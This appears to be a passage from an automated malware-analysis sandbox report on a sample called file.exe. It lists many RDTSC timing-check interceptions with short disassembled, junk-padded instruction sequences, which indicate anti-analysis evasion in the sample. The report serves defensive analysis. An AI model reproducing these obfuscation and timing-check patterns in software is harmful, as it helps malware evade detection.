              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA73B8 second address: DA73C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9A27 second address: DA9A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9A2D second address: DA9A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA88D3 second address: DA88DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F99A1050D66h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF7D8 second address: DAF7DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF7DD second address: DAF7FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A1050D79h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D638BC second address: D638C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D638C0 second address: D638E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A1050D77h 0x00000007 js 00007F99A1050D66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEEB5 second address: DAEECB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99A0E9ACE6h 0x00000008 jp 00007F99A0E9ACE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF358 second address: DAF35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF4C0 second address: DAF4F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F99A0E9ACF8h 0x0000000e push eax 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF66D second address: DAF68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F99A1050D78h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF68E second address: DAF6A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F99A0E9ACE6h 0x0000000e jno 00007F99A0E9ACE6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB157A second address: DB1581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB165F second address: DB1669 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99A0E9ACE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1669 second address: DB1685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007F99A1050D66h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 ja 00007F99A1050D66h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1685 second address: DB169B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB169B second address: DB16B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F99A1050D72h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB17C4 second address: DB17CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB17CA second address: DB17CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1C11 second address: DB1C1B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F99A0E9ACE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1C1B second address: DB1C20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB2275 second address: DB2280 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F99A0E9ACE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB2280 second address: DB228F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB228F second address: DB2294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB23E6 second address: DB23EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB23EB second address: DB23F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB24B3 second address: DB24B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB24B9 second address: DB24BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB364D second address: DB3653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3653 second address: DB3657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB34BA second address: DB34BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4876 second address: DB488B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB488B second address: DB488F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5ECD second address: DB5EE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6A08 second address: DB6A52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F99A1050D68h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 cmc 0x00000025 push 00000000h 0x00000027 cld 0x00000028 mov dword ptr [ebp+122D2A4Fh], ebx 0x0000002e xchg eax, ebx 0x0000002f jmp 00007F99A1050D71h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6A52 second address: DB6A58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6A58 second address: DB6A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB746A second address: DB7475 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F99A0E9ACE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB71FA second address: DB7203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7203 second address: DB7217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A0E9ACECh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7F03 second address: DB7F8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F99A1050D77h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F99A1050D68h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov esi, 752BFAA0h 0x0000002d push 00000000h 0x0000002f mov edi, 183A4280h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F99A1050D68h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000014h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 add dword ptr [ebp+122D37F1h], ecx 0x00000056 xchg eax, ebx 0x00000057 ja 00007F99A1050D74h 0x0000005d jmp 00007F99A1050D6Eh 0x00000062 push eax 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7F8F second address: DB7F9D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F99A0E9ACE6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA675 second address: DBA679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA679 second address: DBA67F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBBB9F second address: DBBBA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBAD82 second address: DBAD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBBBA3 second address: DBBBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F99A1050D6Dh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCD30 second address: DBCD9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F99A0E9ACE8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 jmp 00007F99A0E9ACF0h 0x0000002b sub dword ptr [ebp+122DBB22h], eax 0x00000031 push 00000000h 0x00000033 jmp 00007F99A0E9ACF1h 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jc 00007F99A0E9ACE6h 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCD9A second address: DBCD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCD9E second address: DBCDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDD6F second address: DBDD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDD73 second address: DBDDFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F99A0E9ACF4h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F99A0E9ACF9h 0x00000012 nop 0x00000013 mov ebx, esi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F99A0E9ACE8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D1816h], edx 0x00000037 mov ebx, dword ptr [ebp+122D2A4Fh] 0x0000003d push 00000000h 0x0000003f movsx edi, bx 0x00000042 xchg eax, esi 0x00000043 jmp 00007F99A0E9ACF6h 0x00000048 push eax 0x00000049 pushad 0x0000004a push esi 0x0000004b push ebx 0x0000004c pop ebx 0x0000004d pop esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDDFE second address: DBDE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCF49 second address: DBCF53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F99A0E9ACE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCF53 second address: DBCF66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F99A1050D68h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCF66 second address: DBCFEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ebx, dword ptr [ebp+122D2E23h] 0x0000000f jmp 00007F99A0E9ACEEh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F99A0E9ACE8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c jng 00007F99A0E9ACECh 0x00000042 sub dword ptr [ebp+122D397Dh], edi 0x00000048 mov eax, dword ptr [ebp+122D155Dh] 0x0000004e movzx ebx, bx 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push esi 0x00000056 call 00007F99A0E9ACE8h 0x0000005b pop esi 0x0000005c mov dword ptr [esp+04h], esi 0x00000060 add dword ptr [esp+04h], 00000017h 0x00000068 inc esi 0x00000069 push esi 0x0000006a ret 0x0000006b pop esi 0x0000006c ret 0x0000006d nop 0x0000006e push eax 0x0000006f push edx 0x00000070 jp 00007F99A0E9ACECh 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCFEF second address: DBCFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBECC5 second address: DBED29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F99A0E9ACE8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 movzx edi, di 0x0000002b push 00000000h 0x0000002d jmp 00007F99A0E9ACF3h 0x00000032 xchg eax, esi 0x00000033 je 00007F99A0E9ACF8h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED29 second address: DBED2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED2D second address: DBED3E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99A0E9ACE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED3E second address: DBED44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED44 second address: DBED4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F99A0E9ACE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED4E second address: DBED52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCFF3 second address: DBD00E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99A0E9ACECh 0x00000008 jng 00007F99A0E9ACE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jnp 00007F99A0E9ACE6h 0x0000001a pop ebx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFDF2 second address: DBFDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFDF8 second address: DBFDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFDFC second address: DBFE0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F99A1050D6Eh 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFE0E second address: DBFE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D1C58h], ebx 0x0000000c mov ebx, dword ptr [ebp+122D2C17h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F99A0E9ACE8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 00000000h 0x00000030 sub edi, 156E4E5Fh 0x00000036 xchg eax, esi 0x00000037 push edi 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFE54 second address: DBFE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFE58 second address: DBFE5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1D0D second address: DC1D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0FB6 second address: DC0FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007F99A0E9ACE6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0FC2 second address: DC0FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2D5C second address: DC2D62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2D62 second address: DC2DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F99A1050D68h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F99A1050D68h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov ebx, ecx 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F99A1050D72h 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2DC9 second address: DC2DD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F99A0E9ACE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2EF3 second address: DC2EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2EF7 second address: DC2EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3E62 second address: DC3E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5EB4 second address: DC5EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6E73 second address: DC6E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7D9D second address: DC7DA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7E59 second address: DC7E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8BAF second address: DC8BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F99A0E9ACE6h 0x0000000a rdtsc
